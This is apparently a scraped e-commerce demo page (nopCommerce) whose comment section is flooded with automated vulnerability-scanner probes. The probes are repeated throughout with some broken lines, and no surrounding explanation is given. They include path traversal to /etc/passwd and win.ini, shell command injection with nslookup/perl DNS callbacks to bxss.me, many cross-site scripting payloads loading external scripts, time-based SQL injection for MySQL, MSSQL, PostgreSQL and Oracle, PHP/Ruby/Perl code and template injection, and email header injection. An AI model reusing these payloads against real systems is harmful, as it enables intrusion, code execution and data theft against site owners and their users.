For full feature list go to nopCommerce.com
Providing outstanding custom search engine optimization, web development services and e-commerce development solutions to our clients at a fair price in a professional manner.
This is a sample comment...
555
/../../../../../../../../../../windows/system32/BITSADMIN.exe
response.write(9883998*9179555)
99yWLC5W
'+response.write(9883998*9179555)+'
"+response.write(9883998*9179555)+"
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
'"
../555
<!--
echo zyhhpu$()\ esfcpg\nz^xyu||a #' &echo zyhhpu$()\ esfcpg\nz^xyu||a #|" &echo zyhhpu$()\ esfcpg\nz^xyu||a #
&echo xeumeo$()\ jpmcny\nz^xyu||a #' &echo xeumeo$()\ jpmcny\nz^xyu||a #|" &echo xeumeo$()\ jpmcny\nz^xyu||a #
|echo ucdhnz$()\ bjwfbw\nz^xyu||a #' |echo ucdhnz$()\ bjwfbw\nz^xyu||a #|" |echo ucdhnz$()\ bjwfbw\nz^xyu||a #
(nslookup hitlsugkuikbhe04b8.bxss.me||perl -e "gethostbyname('hitlsugkuikbhe04b8.bxss.me')")
$(nslookup hitbuqymnauljdf1b0.bxss.me||perl -e "gethostbyname('hitbuqymnauljdf1b0.bxss.me')")
&(nslookup hitoxyxnkjdnh90ac6.bxss.me||perl -e "gethostbyname('hitoxyxnkjdnh90ac6.bxss.me')")&'\"`0&(nslookup hitoxyxnkjdnh90ac6.bxss.me||perl -e "gethostbyname('hitoxyxnkjdnh90ac6.bxss.me')")&`'
|(nslookup hitsoxkkkqmjt21443.bxss.me||perl -e "gethostbyname('hitsoxkkkqmjt21443.bxss.me')")
`(nslookup hitdbrqycfguv4adda.bxss.me||perl -e "gethostbyname('hitdbrqycfguv4adda.bxss.me')")`
;(nslookup hitljmqdtmjae02ca8.bxss.me||perl -e "gethostbyname('hitljmqdtmjae02ca8.bxss.me')")|(nslookup hitljmqdtmjae02ca8.bxss.me||perl -e "gethostbyname('hitljmqdtmjae02ca8.bxss.me')")&(nslookup hitljmqdtmjae02ca8.bxss.me||perl -e "gethostbyname('hitljmqdtmjae02ca8.bxss.me')")
555&n972643=v995064
/xfs.bxss.me
555bcc:009247.80505-82180.80505.f9d9f.19871.2@bxss.me
555'"()&%<acx><ScRiPt >pJPa(9998)</ScRiPt>
to@example.com>bcc:009247.80505-82181.80505.f9d9f.19871.2@bxss.me
'"()&%<acx><ScRiPt >pJPa(9425)</ScRiPt>
555<esi:include src="http://bxss.me/rpb.png"/>
5559868679
${10000079+9999022}
acu4233<s1﹥s2ʺs3ʹuca4233
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
)
acux4532%C0%BEz1%C0%BCz2a%90bcxuca4532
Http://bxss.me/t/fit.txt
HttP://bxss.me/t/xss.html?%00
http://bxss.me/t/fit.txt?.jpg
bxss.me/t/xss.html?%00
!(()&&!|*|*|
bxss.me
^(#$!@#$)(()))******
<%={{={@{#{${acx}}%>
"+"A".concat(70-3).concat(22*4).concat(110).concat(72).concat(118).concat(77)+(require"socket"Socket.gethostbyname("hitsf"+"tjwywrbl06026.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(98).concat(87).concat(105).concat(75)+(require'socket'Socket.gethostbyname('hitof'+'mczdfhat94462.bxss.me.')[3].to_s)+'
<th:t="${acx}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
NewsCommentAdd
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
NewsCommentAdd/.
1CKbatZF3xO
acx{{98991*97996}}xca
'.gethostbyname(lc('hitzo'.'tnivqwho80e6a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(85).chr(103).chr(84).'
".gethostbyname(lc("hityg"."jmowhnjyf00de.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(70).chr(99).chr(76)."
acx[[${98991*97996}]]xca
'"()
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
acx__${98991*97996}__::.x
";print(md5(31337));$a="
${@print(md5(31337))}
${@print(md5(31337))}\
'.print(md5(31337)).'
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >pJPa(9771)</ScRiPt>
555<WDJKNW>P4JOT[!+!]</WDJKNW>
555<script>pJPa(9991)</script>
555<ScR<ScRiPt>IpT>pJPa(9924)</sCr<ScRiPt>IpT>
555<ScRiPt >pJPa(9186)</ScRiPt>
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9691></ScRiPt>
555<isindex type=image src=1 onerror=pJPa(9691)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9630'>
555<body onload=pJPa(9516)>
555<img src=//xss.bxss.me/t/dot.gif onload=pJPa(9491)>
555<img src=xyz OnErRor=pJPa(9959)>
555<img/src=">" onerror=alert(9062)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%70%4A%50%61%289179%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\pJPa(9325)\u003C/sCripT\u003E
555<ScRiPt>pJPa(9592)</sCripT>
%F6<img acu onmouseover=pJPa(95001) //%F6>
555<input autofocus onfocus=pJPa(9499)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{acu:Expre/**/SSion(pJPa(9485))}
555piQvz<ScRiPt >pJPa(9154)</ScRiPt>
555<W6U6EH>0CPCM[!+!]</W6U6EH>
555<ifRAme sRc=9756.com></IfRamE>
555<aWXi1Gu x=9750>
555<img sRc='http://attacker-9766/log.php?
555<adg6DiZ<
-1 OR 2+462-462-1=0+0+0+1 --
-1 OR 2+642-642-1=0+0+0+1
-1' OR 2+282-282-1=0+0+0+1 --
-1' OR 2+463-463-1=0+0+0+1 or 'dymBRSSC'='
-1" OR 2+427-427-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
-1)); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
HdykLGdr'; waitfor delay '0:0:15' --
XezYeDT7'); waitfor delay '0:0:15' --
4A7YvlaE')); waitfor delay '0:0:15' --
-5 OR 611=(SELECT 611 FROM PG_SLEEP(15))--
-5) OR 20=(SELECT 20 FROM PG_SLEEP(15))--
-1)) OR 971=(SELECT 971 FROM PG_SLEEP(15))--
3Frk2dUK' OR 80=(SELECT 80 FROM PG_SLEEP(15))--
FSGsQGf7') OR 31=(SELECT 31 FROM PG_SLEEP(15))--
opFwqToO')) OR 196=(SELECT 196 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
@@ce6S9
1clRkMEEO
response.write(9475055*9930629)
'+response.write(9475055*9930629)+'
"+response.write(9475055*9930629)+"
CIgRJ4QY
echo whltqb$()\ kuwnqb\nz^xyu||a #' &echo whltqb$()\ kuwnqb\nz^xyu||a #|" &echo whltqb$()\ kuwnqb\nz^xyu||a #
555bcc:009247.6274-1981.6274.28770.20044.2@bxss.me
&echo xyvitr$()\ txjelt\nz^xyu||a #' &echo xyvitr$()\ txjelt\nz^xyu||a #|" &echo xyvitr$()\ txjelt\nz^xyu||a #
1
|echo obkzmn$()\ mgquke\nz^xyu||a #' |echo obkzmn$()\ mgquke\nz^xyu||a #|" |echo obkzmn$()\ mgquke\nz^xyu||a #
to@example.com>bcc:009247.6274-1985.6274.28770.20044.2@bxss.me
(nslookup hitvtcgufaqzdd74de.bxss.me||perl -e "gethostbyname('hitvtcgufaqzdd74de.bxss.me')")
$(nslookup hitgxnlsxskde4f96e.bxss.me||perl -e "gethostbyname('hitgxnlsxskde4f96e.bxss.me')")
&(nslookup hitilldaccoouc37fd.bxss.me||perl -e "gethostbyname('hitilldaccoouc37fd.bxss.me')")&'\"`0&(nslookup hitilldaccoouc37fd.bxss.me||perl -e "gethostbyname('hitilldaccoouc37fd.bxss.me')")&`'
|(nslookup hitjlydojueia92f6a.bxss.me||perl -e "gethostbyname('hitjlydojueia92f6a.bxss.me')")
`(nslookup hitcpjoyisvva44344.bxss.me||perl -e "gethostbyname('hitcpjoyisvva44344.bxss.me')")`
;(nslookup hitntcyjibqck1ddf3.bxss.me||perl -e "gethostbyname('hitntcyjibqck1ddf3.bxss.me')")|(nslookup hitntcyjibqck1ddf3.bxss.me||perl -e "gethostbyname('hitntcyjibqck1ddf3.bxss.me')")&(nslookup hitntcyjibqck1ddf3.bxss.me||perl -e "gethostbyname('hitntcyjibqck1ddf3.bxss.me')")
${10000457+9999239}
555&n979803=v912721
-1 OR 2+738-738-1=0+0+0+1 --
-1 OR 2+950-950-1=0+0+0+1
-1' OR 2+289-289-1=0+0+0+1 --
-1' OR 2+387-387-1=0+0+0+1 or 'vUEj2D1N'='
/etc/shells
c:/windows/win.ini
-1" OR 2+176-176-1=0+0+0+1 --
'.gethostbyname(lc('hityt'.'huhgxcpmb9e13.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(66).chr(121).chr(70).'
".gethostbyname(lc("hitta"."uisdwlro1da39.bxss.me."))."A".chr(67).chr(hex("58")).chr(113).chr(73).chr(98).chr(89)."
jRBBRl1v'; waitfor delay '0:0:15' --
mPslOgeQ'); waitfor delay '0:0:15' --
pLss9GDn')); waitfor delay '0:0:15' --
-5 OR 460=(SELECT 460 FROM PG_SLEEP(15))--
-5) OR 884=(SELECT 884 FROM PG_SLEEP(15))--
-1)) OR 949=(SELECT 949 FROM PG_SLEEP(15))--
"+"A".concat(70-3).concat(22*4).concat(111).concat(72).concat(110).concat(74)+(require"socket"Socket.gethostbyname("hitck"+"nnpeyfkv70f3c.bxss.me.")[3].to_s)+"
otzPjO8d' OR 588=(SELECT 588 FROM PG_SLEEP(15))--
'+'A'.concat(70-3).concat(22*4).concat(98).concat(70).concat(104).concat(71)+(require'socket'Socket.gethostbyname('hitdb'+'zmbnarxre9cba.bxss.me.')[3].to_s)+'
ettTdUx6') OR 283=(SELECT 283 FROM PG_SLEEP(15))--
7kg85Oxr')) OR 305=(SELECT 305 FROM PG_SLEEP(15))--
@@nLRqm
555'"()&%<acx><ScRiPt >H1Jo(9014)</ScRiPt>
'"()&%<acx><ScRiPt >H1Jo(9560)</ScRiPt>
5559484580
acu2787<s1﹥s2ʺs3ʹuca2787
acux2436%C0%BEz1%C0%BCz2a%90bcxuca2436
555<ScRiPt >H1Jo(9646)</ScRiPt>
555<WQXNDD>TRRPK[!+!]</WQXNDD>
555<script>H1Jo(9475)</script>
555<ScR<ScRiPt>IpT>H1Jo(9070)</sCr<ScRiPt>IpT>
555<ScRiPt >H1Jo(9961)</ScRiPt>
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9440></ScRiPt>
555<isindex type=image src=1 onerror=H1Jo(9269)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9240'>
555<body onload=H1Jo(9616)>
555<img src=//xss.bxss.me/t/dot.gif onload=H1Jo(9461)>
555<img src=xyz OnErRor=H1Jo(9062)>
555<img/src=">" onerror=alert(9510)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%48%31%4A%6F%289562%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\H1Jo(9154)\u003C/sCripT\u003E
555<ScRiPt>H1Jo(9463)</sCripT>
%F6<img acu onmouseover=H1Jo(93761) //%F6>
555<input autofocus onfocus=H1Jo(9303)>
555}body{acu:Expre/**/SSion(H1Jo(9866))}
555878Sd<ScRiPt >H1Jo(9748)</ScRiPt>
555<WK7R4E>SW7QX[!+!]</WK7R4E>
555<ifRAme sRc=9585.com></IfRamE>
555<aGERaKZ x=9086>
555<img sRc='http://attacker-9470/log.php?
555<alCwiWK<
555'"()&%<acx><ScRiPt >O2EW(9660)</ScRiPt>
'"()&%<acx><ScRiPt >O2EW(9206)</ScRiPt>
5559651473
acu8492<s1﹥s2ʺs3ʹuca8492
response.write(9840564*9649978)
'+response.write(9840564*9649978)+'
acux9927%C0%BEz1%C0%BCz2a%90bcxuca9927
"+response.write(9840564*9649978)+"
wP5sFzPx
echo ajtbth$()\ totlpu\nz^xyu||a #' &echo ajtbth$()\ totlpu\nz^xyu||a #|" &echo ajtbth$()\ totlpu\nz^xyu||a #
&echo vczxym$()\ jtblmt\nz^xyu||a #' &echo vczxym$()\ jtblmt\nz^xyu||a #|" &echo vczxym$()\ jtblmt\nz^xyu||a #
|echo bitlqa$()\ wwdqmt\nz^xyu||a #' |echo bitlqa$()\ wwdqmt\nz^xyu||a #|" |echo bitlqa$()\ wwdqmt\nz^xyu||a #
(nslookup hitmsbqkuaduod878d.bxss.me||perl -e "gethostbyname('hitmsbqkuaduod878d.bxss.me')")
$(nslookup hitgvkhqhyilne4e53.bxss.me||perl -e "gethostbyname('hitgvkhqhyilne4e53.bxss.me')")
&(nslookup hitdlhydzxrcwe2757.bxss.me||perl -e "gethostbyname('hitdlhydzxrcwe2757.bxss.me')")&'\"`0&(nslookup hitdlhydzxrcwe2757.bxss.me||perl -e "gethostbyname('hitdlhydzxrcwe2757.bxss.me')")&`'
|(nslookup hititoxptdaur3b591.bxss.me||perl -e "gethostbyname('hititoxptdaur3b591.bxss.me')")
../1
`(nslookup hitezdeaukdze7805d.bxss.me||perl -e "gethostbyname('hitezdeaukdze7805d.bxss.me')")`
;(nslookup hitamrzyefxucfc005.bxss.me||perl -e "gethostbyname('hitamrzyefxucfc005.bxss.me')")|(nslookup hitamrzyefxucfc005.bxss.me||perl -e "gethostbyname('hitamrzyefxucfc005.bxss.me')")&(nslookup hitamrzyefxucfc005.bxss.me||perl -e "gethostbyname('hitamrzyefxucfc005.bxss.me')")
1%0abcc:009247.6274-2479.6274.7276b.20044.2@bxss.me
to@example.com>%0d%0abcc:009247.6274-2480.6274.7276b.20044.2@bxss.me
1<esi:include src="http://bxss.me/rpb.png"/>
${9999233+9999891}
555<ScRiPt >O2EW(9105)</ScRiPt>
1&n957445=v994643
555<WYPWH0>GINEL[!+!]</WYPWH0>
12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg
1some_inexistent_file_with_long_name%00.jpg
555<script>O2EW(9961)</script>
http://bxss.me/t/fit.txt%3F.jpg
555<ScR<ScRiPt>IpT>O2EW(9756)</sCr<ScRiPt>IpT>
555<ScRiPt >O2EW(9047)</ScRiPt>
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9009></ScRiPt>
555<isindex type=image src=1 onerror=O2EW(9963)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9201'>
555<body onload=O2EW(9855)>
555<img src=//xss.bxss.me/t/dot.gif onload=O2EW(9877)>
555<img src=xyz OnErRor=O2EW(9794)>
555<img/src=">" onerror=alert(9643)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%4F%32%45%57%289185%29%3C%2F%73%43%72%69%70%54%3E
-1 OR 2+675-675-1=0+0+0+1 --
555\u003CScRiPt\O2EW(9809)\u003C/sCripT\u003E
-1 OR 2+632-632-1=0+0+0+1
-1' OR 2+209-209-1=0+0+0+1 --
-1' OR 2+959-959-1=0+0+0+1 or '7GgYMdXh'='
-1" OR 2+761-761-1=0+0+0+1 --
555<ScRiPt>O2EW(9452)</sCripT>
%F6<img acu onmouseover=O2EW(94181) //%F6>
555<input autofocus onfocus=O2EW(9207)>
555}body{acu:Expre/**/SSion(O2EW(9534))}
zCGOZ2gn'; waitfor delay '0:0:15' --
NEqwyXKJ'); waitfor delay '0:0:15' --
'.gethostbyname(lc('hitgq'.'unnaiwtx6371b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(70).chr(100).chr(81).'
555ASfoi<ScRiPt >O2EW(9205)</ScRiPt>
".gethostbyname(lc("hitfr"."vuaecpksd42b5.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(66).chr(106).chr(79)."
mWIi9k5c')); waitfor delay '0:0:15' --
555<WVKPBR>78NES[!+!]</WVKPBR>
-5 OR 116=(SELECT 116 FROM PG_SLEEP(15))--
-5) OR 798=(SELECT 798 FROM PG_SLEEP(15))--
-1)) OR 80=(SELECT 80 FROM PG_SLEEP(15))--
"+"A".concat(70-3).concat(22*4).concat(114).concat(89).concat(119).concat(87)+(require"socket"Socket.gethostbyname("hitto"+"ognqhqaq6d6e9.bxss.me.")[3].to_s)+"
555<ifRAme sRc=9318.com></IfRamE>
'+'A'.concat(70-3).concat(22*4).concat(117).concat(80).concat(109).concat(72)+(require'socket'Socket.gethostbyname('hityf'+'bqkodnzke671f.bxss.me.')[3].to_s)+'
6y1pqOkL' OR 561=(SELECT 561 FROM PG_SLEEP(15))--
ehYb3OBc') OR 640=(SELECT 640 FROM PG_SLEEP(15))--
bD52rgex')) OR 531=(SELECT 531 FROM PG_SLEEP(15))--
555<aueTxOp x=9458>
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555<img sRc='http://attacker-9147/log.php?
1 ����%2527%2522
555'"()&%<acx><ScRiPt >tNit(9896)</ScRiPt>
@@Bw8qZ
'"()&%<acx><ScRiPt >tNit(9321)</ScRiPt>
555<ac3VwzI<
5559261877
acu4567<s1﹥s2ʺs3ʹuca4567
acux10538%C0%BEz1%C0%BCz2a%90bcxuca10538
555<ScRiPt >tNit(9604)</ScRiPt>
555<WCFYSY>L1NJH[!+!]</WCFYSY>
555<script>tNit(9533)</script>
555<ScR<ScRiPt>IpT>tNit(9093)</sCr<ScRiPt>IpT>
555<ScRiPt >tNit(9728)</ScRiPt>
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9148></ScRiPt>
555<isindex type=image src=1 onerror=tNit(9077)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9167'>
555<body onload=tNit(9076)>
1'"()&%<acx><ScRiPt >vayX(9040)</ScRiPt>
'"()&%<acx><ScRiPt >vayX(9313)</ScRiPt>
555<img src=//xss.bxss.me/t/dot.gif onload=tNit(9177)>
19697956
555<img src=xyz OnErRor=tNit(9623)>
acu1461%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca1461
acux9388%C0%BEz1%C0%BCz2a%90bcxuca9388
555<img/src=">" onerror=alert(9681)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%74%4E%69%74%289053%29%3C%2F%73%43%72%69%70%54%3E
555'"()&%<acx><ScRiPt >AMWP(9796)</ScRiPt>
555\u003CScRiPt\tNit(9928)\u003C/sCripT\u003E
'"()&%<acx><ScRiPt >AMWP(9151)</ScRiPt>
555<ScRiPt>tNit(9452)</sCripT>
5559649437
1<ScRiPt >vayX(9877)</ScRiPt>
%F6<img acu onmouseover=tNit(99181) //%F6>
1<WIASB2>JA4DD[!+!]</WIASB2>
acu9178<s1﹥s2ʺs3ʹuca9178
1<script>vayX(9276)</script>
555<input autofocus onfocus=tNit(9494)>
acux5927%C0%BEz1%C0%BCz2a%90bcxuca5927
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%76%61%79%58%28%39%39%34%32%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1<ScRiPt >vayX(9405)</ScRiPt>
1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9056></ScRiPt>
1<
This is a sample comment...
555
/../../../../../../../../../../windows/system32/BITSADMIN.exe
555
response.write(9883998*9179555)
99yWLC5W
'+response.write(9883998*9179555)+'
555
555
"+response.write(9883998*9179555)+"
555
555
555
555
../../../../../../../../../../../../../../etc/passwd
555
../../../../../../../../../../../../../../windows/win.ini
555
'"
../555
<!--
echo zyhhpu$()\ esfcpg\nz^xyu||a #' &echo zyhhpu$()\ esfcpg\nz^xyu||a #|" &echo zyhhpu$()\ esfcpg\nz^xyu||a #
555
&echo xeumeo$()\ jpmcny\nz^xyu||a #' &echo xeumeo$()\ jpmcny\nz^xyu||a #|" &echo xeumeo$()\ jpmcny\nz^xyu||a #
555
555
555
|echo ucdhnz$()\ bjwfbw\nz^xyu||a #' |echo ucdhnz$()\ bjwfbw\nz^xyu||a #|" |echo ucdhnz$()\ bjwfbw\nz^xyu||a #
555
555
555
(nslookup hitlsugkuikbhe04b8.bxss.me||perl -e "gethostbyname('hitlsugkuikbhe04b8.bxss.me')")
555
555
$(nslookup hitbuqymnauljdf1b0.bxss.me||perl -e "gethostbyname('hitbuqymnauljdf1b0.bxss.me')")
555
&(nslookup hitoxyxnkjdnh90ac6.bxss.me||perl -e "gethostbyname('hitoxyxnkjdnh90ac6.bxss.me')")&'\"`0&(nslookup hitoxyxnkjdnh90ac6.bxss.me||perl -e "gethostbyname('hitoxyxnkjdnh90ac6.bxss.me')")&`'
|(nslookup hitsoxkkkqmjt21443.bxss.me||perl -e "gethostbyname('hitsoxkkkqmjt21443.bxss.me')")
555
555
555
555
`(nslookup hitdbrqycfguv4adda.bxss.me||perl -e "gethostbyname('hitdbrqycfguv4adda.bxss.me')")`
;(nslookup hitljmqdtmjae02ca8.bxss.me||perl -e "gethostbyname('hitljmqdtmjae02ca8.bxss.me')")|(nslookup hitljmqdtmjae02ca8.bxss.me||perl -e "gethostbyname('hitljmqdtmjae02ca8.bxss.me')")&(nslookup hitljmqdtmjae02ca8.bxss.me||perl -e "gethostbyname('hitljmqdtmjae02ca8.bxss.me')")
555
555
555
555
555
555&n972643=v995064
555
555
555
555
555
555
555
555
/xfs.bxss.me
555
bcc:009247.80505-82180.80505.f9d9f.19871.2@bxss.me
555
555'"()&%<acx><ScRiPt >pJPa(9998)</ScRiPt>
to@example.com>
bcc:009247.80505-82181.80505.f9d9f.19871.2@bxss.me
555
555
555
555
555
'"()&%<acx><ScRiPt >pJPa(9425)</ScRiPt>
555
555<esi:include src="http://bxss.me/rpb.png"/>
555
555
555
5559868679
555
${10000079+9999022}
555
555
acu4233<s1﹥s2ʺs3ʹuca4233
555
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
)
acux4532%C0%BEz1%C0%BCz2a%90bcxuca4532
Http://bxss.me/t/fit.txt
HttP://bxss.me/t/xss.html?%00
http://bxss.me/t/fit.txt?.jpg
bxss.me/t/xss.html?%00
555
!(()&&!|*|*|
bxss.me
555
^(#$!@#$)(()))******
<%={{={@{#{${acx}}%>
555
555
"+"A".concat(70-3).concat(22*4).concat(110).concat(72).concat(118).concat(77)+(require"socket"
Socket.gethostbyname("hitsf"+"tjwywrbl06026.bxss.me.")[3].to_s)+"
555
555
'+'A'.concat(70-3).concat(22*4).concat(98).concat(87).concat(105).concat(75)+(require'socket'
Socket.gethostbyname('hitof'+'mczdfhat94462.bxss.me.')[3].to_s)+'
555
555
555
555
555
555
555
<th:t="${acx}#foreach
555
555
555
555
555
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
555
555
555
555
NewsCommentAdd
555
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
NewsCommentAdd/.
1CKbatZF3xO
acx{{98991*97996}}xca
555
555
555
555
555
555
'.gethostbyname(lc('hitzo'.'tnivqwho80e6a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(85).chr(103).chr(84).'
555
555
555
".gethostbyname(lc("hityg"."jmowhnjyf00de.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(70).chr(99).chr(76)."
acx[[${98991*97996}]]xca
'"()
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
';print(md5(31337));$a='
acx__${98991*97996}__::.x
";print(md5(31337));$a="
${@print(md5(31337))}
555
555
${@print(md5(31337))}\
555
555
'.print(md5(31337)).'
555
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555
555
555<ScRiPt >pJPa(9771)</ScRiPt>
555
555
555
555
555<WDJKNW>P4JOT[!+!]</WDJKNW>
555<script>pJPa(9991)</script>
555
555
555
555<ScR<ScRiPt>IpT>pJPa(9924)</sCr<ScRiPt>IpT>
555
555
555
555<ScRiPt
>pJPa(9186)</ScRiPt>
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9691></ScRiPt>
555<isindex type=image src=1 onerror=pJPa(9691)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9630'>
555<body onload=pJPa(9516)>
555<img src=//xss.bxss.me/t/dot.gif onload=pJPa(9491)>
555<img src=xyz OnErRor=pJPa(9959)>
555<img/src=">" onerror=alert(9062)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%70%4A%50%61%289179%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\pJPa(9325)\u003C/sCripT\u003E
555<ScRiPt>pJPa(9592)</sCripT>
%F6<img acu onmouseover=pJPa(95001) //%F6>
555<input autofocus onfocus=pJPa(9499)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{acu:Expre/**/SSion(pJPa(9485))}
555piQvz
<ScRiPt >pJPa(9154)</ScRiPt>
555<W6U6EH>0CPCM[!+!]</W6U6EH>
555<ifRAme sRc=9756.com></IfRamE>
555<aWXi1Gu x=9750>
555<img sRc='http://attacker-9766/log.php?
555<adg6DiZ<
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 2+462-462-1=0+0+0+1 --
-1 OR 2+642-642-1=0+0+0+1
-1' OR 2+282-282-1=0+0+0+1 --
-1' OR 2+463-463-1=0+0+0+1 or 'dymBRSSC'='
-1" OR 2+427-427-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
-1)); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
HdykLGdr'; waitfor delay '0:0:15' --
XezYeDT7'); waitfor delay '0:0:15' --
4A7YvlaE')); waitfor delay '0:0:15' --
-5 OR 611=(SELECT 611 FROM PG_SLEEP(15))--
-5) OR 20=(SELECT 20 FROM PG_SLEEP(15))--
-1)) OR 971=(SELECT 971 FROM PG_SLEEP(15))--
3Frk2dUK' OR 80=(SELECT 80 FROM PG_SLEEP(15))--
FSGsQGf7') OR 31=(SELECT 31 FROM PG_SLEEP(15))--
opFwqToO')) OR 196=(SELECT 196 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
@@ce6S9
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
1clRkMEEO
555
555
/../../../../../../../../../../windows/system32/BITSADMIN.exe
response.write(9475055*9930629)
555
'+response.write(9475055*9930629)+'
555
555
"+response.write(9475055*9930629)+"
CIgRJ4QY
555
555
555
555
555
555
echo whltqb$()\ kuwnqb\nz^xyu||a #' &echo whltqb$()\ kuwnqb\nz^xyu||a #|" &echo whltqb$()\ kuwnqb\nz^xyu||a #
555
bcc:009247.6274-1981.6274.28770.20044.2@bxss.me
555
&echo xyvitr$()\ txjelt\nz^xyu||a #' &echo xyvitr$()\ txjelt\nz^xyu||a #|" &echo xyvitr$()\ txjelt\nz^xyu||a #
../../../../../../../../../../../../../../etc/passwd
1
|echo obkzmn$()\ mgquke\nz^xyu||a #' |echo obkzmn$()\ mgquke\nz^xyu||a #|" |echo obkzmn$()\ mgquke\nz^xyu||a #
to@example.com>
bcc:009247.6274-1985.6274.28770.20044.2@bxss.me
1
555
(nslookup hitvtcgufaqzdd74de.bxss.me||perl -e "gethostbyname('hitvtcgufaqzdd74de.bxss.me')")
555
../../../../../../../../../../../../../../windows/win.ini
$(nslookup hitgxnlsxskde4f96e.bxss.me||perl -e "gethostbyname('hitgxnlsxskde4f96e.bxss.me')")
555
555
555
&(nslookup hitilldaccoouc37fd.bxss.me||perl -e "gethostbyname('hitilldaccoouc37fd.bxss.me')")&'\"`0&(nslookup hitilldaccoouc37fd.bxss.me||perl -e "gethostbyname('hitilldaccoouc37fd.bxss.me')")&`'
555
|(nslookup hitjlydojueia92f6a.bxss.me||perl -e "gethostbyname('hitjlydojueia92f6a.bxss.me')")
../555
555<esi:include src="http://bxss.me/rpb.png"/>
`(nslookup hitcpjoyisvva44344.bxss.me||perl -e "gethostbyname('hitcpjoyisvva44344.bxss.me')")`
555
555
